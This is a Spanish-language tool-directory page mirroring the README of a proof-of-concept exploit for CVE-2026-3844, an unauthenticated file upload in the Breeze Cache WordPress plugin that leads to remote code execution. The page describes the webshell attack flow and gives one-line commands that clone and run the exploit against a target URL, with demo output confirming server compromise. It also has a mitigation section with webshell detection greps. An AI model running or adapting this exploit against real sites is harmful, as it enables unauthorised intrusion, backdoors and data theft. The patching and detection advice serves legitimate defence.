Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-3844 — Exploit PoC para CVE-2026-3844, una vulnerabilidad crítica de subida de archivos sin autenticación en el plugin Breeze de WordPress que conduce a RCE. | Kitploit
Herramientas/GitHubGitHub/tausifzaman/cve-2026-3844
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y EducaciónRed Teaming
GitHubtausifzaman/cve-2026-3844

CVE-2026-3844

Exploit PoC para CVE-2026-3844, una vulnerabilidad crítica de subida de archivos sin autenticación en el plugin Breeze de WordPress que conduce a RCE.

Ver Repositorio
3hace 3 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-3844

Exploit PoC para CVE-2026-3844, una vulnerabilidad crítica de subida arbitraria de archivos sin autenticación en el plugin Breeze de WordPress que conduce a RCE.

CVE-2026-3844 Typing SVG

CVE ID CVSS Score CWE Python WordPress Platform PoC Author



📌 Descripción general

CVE-2026-3844 es una vulnerabilidad CRÍTICA de subida arbitraria de archivos sin autenticación en el plugin de WordPress Breeze Cache (de Cloudways), que afecta a todas las versiones hasta la 2.4.4 incluida.

Este repositorio proporciona un exploit de Prueba de Concepto (PoC) (CVE-2026-3844.py) para investigación de seguridad autorizada, pruebas de penetración y divulgación responsable.


Código de una línea

root@kitploit:~
git clone https://github.com/tausifzaman/CVE-2026-3844.git && cd CVE-2026-3844 && python3

📊 Resumen de la vulnerabilidad


🔍 Detalles de la vulnerabilidad

Causa raíz

El plugin Breeze Cache para WordPress obtiene imágenes de Gravatar remotas y las almacena localmente cuando la función "Host Files Locally – Gravatars" está habilitada. La función vulnerable fetch_gravatar_from_remote en class-breeze-cache-cronjobs.php (líneas 89–119) no realiza ninguna validación de tipo de archivo ni de extensión sobre el contenido remoto obtenido.

root@kitploit:~
class-breeze-cache-cronjobs.php
  └── fetch_gravatar_from_remote()   ← ❌ No file type validation
        └── Saves remote content directly to disk
              └── Attacker controls → uploads .php webshell → RCE

Flujo del ataque

root@kitploit:~
Attacker (Unauthenticated)
    │
    ▼
Craft malicious HTTP request with PHP webshell URL as Gravatar
    │
    ▼
Plugin fetches & saves the .php file without validation
    │
    ▼
Webshell stored on server (e.g., /wp-content/breeze-cache/evil.php)
    │
    ▼
Attacker accesses webshell → Full RCE achieved

Impacto

Si se explota con éxito, un atacante puede:

  • 🔴 Ejecutar comandos arbitrarios del sistema operativo (RCE)
  • 🔴 Subir puertas traseras / webshells persistentes
  • 🔴 Crear cuentas de administrador de WordPress fraudulentas
  • 🔴 Exfiltrar bases de datos, credenciales y archivos sensibles
  • 🔴 Desfigurar el sitio web o eliminar todo el contenido
  • 🔴 Usar el servidor para pivotar a otros sistemas en la misma red
  • 🔴 Reclutar el servidor para una botnet

⚙️ Requisitos

  • Python 3.6+
  • Librería requests
  • Sitio objetivo que ejecute Breeze Cache ≤ 2.4.4 con "Host Files Locally – Gravatars" habilitado

🚀 Instalación y configuración

🐧 Linux / Termux (Android)

root@kitploit:~
# Clone the repository
git clone https://github.com/tausifzaman/CVE-2026-3844.git && cd CVE-2026-3844 && python3 CVE-2026-3844.py

# Navigate into the directory
cd CVE-2026-3844

# Install dependencies
pip install -r requirements.txt

# Run the exploit
python3 CVE-2026-3844.py

🪟 Windows (CMD / PowerShell)

root@kitploit:~
git clone https://github.com/tausifzaman/CVE-2026-3844.git
cd CVE-2026-3844
pip install -r requirements.txt
python CVE-2026-3844.py

🍎 macOS

root@kitploit:~
git clone https://github.com/tausifzaman/CVE-2026-3844.git
cd CVE-2026-3844
pip3 install -r requirements.txt
python3 CVE-2026-3844.py

🤖 Termux (una sola línea)

root@kitploit:~
pkg install python git -y && git clone https://github.com/tausifzaman/CVE-2026-3844.git && cd CVE-2026-3844 && pip install -r requirements.txt && python3 CVE-2026-3844.py

☁️ Google Cloud Shell (sin configuración necesaria)

Open in Cloud Shell

root@kitploit:~
git clone https://github.com/tausifzaman/CVE-2026-3844.git && cd CVE-2026-3844 && pip install -r requirements.txt && python3 CVE-2026-3844.py

💻 Uso

root@kitploit:~
python3 CVE-2026-3844.py

Opciones

root@kitploit:~
usage: CVE-2026-3844.py [-h] -u URL [-t TIMEOUT] [-o OUTPUT] [-v]

CVE-2026-3844 — Breeze Cache WordPress Plugin Arbitrary File Upload PoC

optional arguments:
  -h, --help              Show this help message and exit
  -u URL, --url URL       Target URL (e.g. https://target.com)
  -t TIMEOUT              Request timeout in seconds (default: 10)
  -o OUTPUT               Save webshell path to output file
  -v, --verbose           Enable verbose/debug output

Ejemplos

root@kitploit:~
# Basic usage
python3 CVE-2026-3844.py -u https://vulnerable-site.com

# Verbose mode
python3 CVE-2026-3844.py -u https://vulnerable-site.com -v

# Custom timeout
python3 CVE-2026-3844.py -u https://vulnerable-site.com -t 20 -v

🖥️ Salida de demostración del PoC

root@kitploit:~
╔══════════════════════════════════════════════════════╗
║          CVE-2026-3844 | Breeze Cache WP RCE        ║
║          Researcher: tausifzaman.online              ║
╚══════════════════════════════════════════════════════╝

[*] Target     : https://vulnerable-site.com
[*] CVE        : CVE-2026-3844
[*] Plugin     : Breeze Cache ≤ 2.4.4
[*] Type       : Unauthenticated Arbitrary File Upload → RCE
[*] Checking target...

[+] Breeze Cache plugin detected!
[+] "Host Files Locally – Gravatars" is ENABLED
[*] Uploading PHP webshell via fetch_gravatar_from_remote...
[+] File uploaded successfully!
[+] Webshell path: /wp-content/breeze-cache/avatar_a1b2c3.php
[*] Verifying RCE...
[+] RCE CONFIRMED!

[+] Command output (id):
    uid=33(www-data) gid=33(www-data) groups=33(www-data)

[+] Full server compromise achieved.
[*] Cleanup: Remove /wp-content/breeze-cache/avatar_a1b2c3.php after testing.

🔒 Mitigación y remediación

✅ Acción inmediata

Actualice Breeze Cache a la versión 2.4.5 o posterior — esta es la única solución completa.

root@kitploit:~
# WordPress CLI — update Breeze plugin immediately
wp plugin update breeze

🛡️ Mitigaciones temporales (si no puede actualizar de inmediato)

  1. Deshabilite la opción "Host Files Locally – Gravatars" en la configuración de Breeze Cache
  2. Bloquee el endpoint vulnerable mediante una regla de WAF o .htaccess
  3. Deniegue la ejecución de PHP en los directorios de subidas y caché:
root@kitploit:~
# Add to /wp-content/uploads/.htaccess and /wp-content/cache/.htaccess
<FilesMatch "\.php$">
    deny from all
</FilesMatch>
  1. Busque archivos sospechosos creados o modificados recientemente:
root@kitploit:~
# Find recently modified PHP files in wp-content (possible webshells)
find /var/www/html/wp-content -name "*.php" -newer /var/www/html/wp-config.php -ls

# Search for common webshell indicators
grep -r "eval(base64_decode" /var/www/html/wp-content/
grep -r "system\|exec\|passthru\|shell_exec" /var/www/html/wp-content/cache/
  1. Bloquee las solicitudes POST sospechosas dirigidas a la funcionalidad de obtención de Gravatar mediante su WAF
  2. Supervise los registros de acceso en busca de solicitudes a /wp-content/breeze-cache/*.php
root@kitploit:~
# Monitor Apache/Nginx access logs for webshell hits
grep "breeze-cache.*\.php" /var/log/apache2/access.log
grep "breeze-cache.*\.php" /var/log/nginx/access.log

🔍 Comprobar si ya está comprometido

root@kitploit:~
# Check for unexpected PHP files in Breeze cache directory
find /var/www/html/wp-content/breeze-cache/ -name "*.php"

# Check for recently created files (last 7 days)
find /var/www/html/wp-content/ -name "*.php" -mtime -7

# Look for admin accounts created recently (run in wp-mysql)
SELECT user_login, user_registered FROM wp_users ORDER BY user_registered DESC LIMIT 10;

📚 Referencias


👤 Autor

Tausif Zaman

🌐 tausifzaman.online  ·  🐙 GitHub @tausifzaman

Investigador de seguridad · Cazador de bugs (Bug Bounty) · Desarrollador de herramientas

Android · Python · PHP · Seguridad web · Pruebas de penetración


⚠️ Aviso legal

Este repositorio y el código de exploit que contiene se proporcionan estrictamente con fines educativos y únicamente para investigación de seguridad autorizada.

  • ✅ Puede usar esta herramienta en sistemas de su propiedad o para los que tenga autorización escrita explícita para realizar pruebas
  • ❌ El uso no autorizado contra sistemas de terceros es ilegal según la Computer Fraud and Abuse Act (CFAA), la Computer Misuse Act y las leyes equivalentes en todo el mundo
  • El autor no asume ninguna responsabilidad por el mal uso, los daños o la actividad ilegal derivados del uso de esta herramienta

Hackee de forma ética. Reporte de forma responsable. Manténgase dentro de la ley. 🛡️


⭐ Si esto ayudó a su investigación, ¡deje una estrella al repositorio! ⭐

Star   Follow   Website

Descargar herramienta
CampoDetalles
ID CVECVE-2026-3844
PluginBreeze Cache (de Cloudways)
Versiones afectadasTodas las versiones ≤ 2.4.4
Versión parcheadaBreeze 2.4.5+
Tipo de vulnerabilidadCWE-434 — Subida sin restricciones de archivos con tipo peligroso
Puntuación CVSS v3.19.8 (CRÍTICA)
Puntuación CVSS v2.010.0 (CRÍTICA)
Vector CVSSCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Vector de ataqueRed (remoto)
Autenticación requerida❌ Ninguna — Sin autenticación
Condición"Host Files Locally – Gravatars" debe estar habilitada (deshabilitada por defecto)
ImpactoConfidencialidad: ALTA · Integridad: ALTA · Disponibilidad: ALTA
Publicado2026-04-23
FuenteWordfence / NVD / MITRE
PoCTausif Zaman
FuenteEnlace
🔗 NVD (NIST)nvd.nist.gov/vuln/detail/CVE-2026-3844
🔗 MITRE CVEcve.mitre.org – CVE-2026-3844
🔗 Aviso de Wordfencewordfence.com – Threat Intel
🔗 Registro de cambios del plugin de WordPressplugins.trac.wordpress.org/changeset/3511463/breeze
🔗 Código vulnerable (L89)class-breeze-cache-cronjobs.php#L89
🔗 Código vulnerable (L119)class-breeze-cache-cronjobs.php#L119
🔗 Aviso de GitHubGHSA-c529-q7mw-hq6j
🔗 Repositorio del PoCgithub.com/tausifzaman/CVE-2026-3844